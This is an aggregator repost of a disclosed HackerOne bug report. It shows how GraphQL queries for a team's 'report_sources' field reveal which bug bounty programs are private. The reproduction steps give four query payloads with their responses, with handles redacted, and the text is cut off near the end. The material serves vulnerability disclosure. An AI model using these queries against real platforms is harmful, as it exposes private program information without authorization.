๐ HackerOne: Unauthorized user can obtain `report_sources` attribute through Team GraphQL object
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: Hi team. And Happy New Year! Description: If I am not mistaken, then through this parameter we can define private programs with an external link. If this parameter is not empty, then the program is private. - ["HackerOne Platform"] Steps To Reproduce https://hackerone.com/graphql POST: 1){"query": "query {team(handle:\"โโโโโโโโ\"){_id,report_sources}}"} {"data":{"team":{"_id":"โโโโโโโโโโ","report_sources":[]}}} - not private program 2){"query": "query {team(handle:\"โโโ\"){_id,report_sources}}"} {"data":{"team":{"_id":"โโโโโ","report_sources":["HackerOne Platform"]}}} - ["HackerOne Platform"] - private program 3){"query": "query {team(handle:\"โโโโโโโโโ\"){_id,report_sources}}"} {"data":{"team":{"_id":"โโโโโโโโโ","report_sources":["HackerOne Platform"]}}} - ["HackerOne Platform"] - private program 4){"query": "query {team(handle:\"โโโโโ\"){_id,report_sources}}"} {"data":{"team":{"_id":"โโโ","report_sources":[]}}} - not private program Sorry i bad speak english I hope you understand me Thank you,haxta4ok00 Impact disclosed of private programs who have external... ...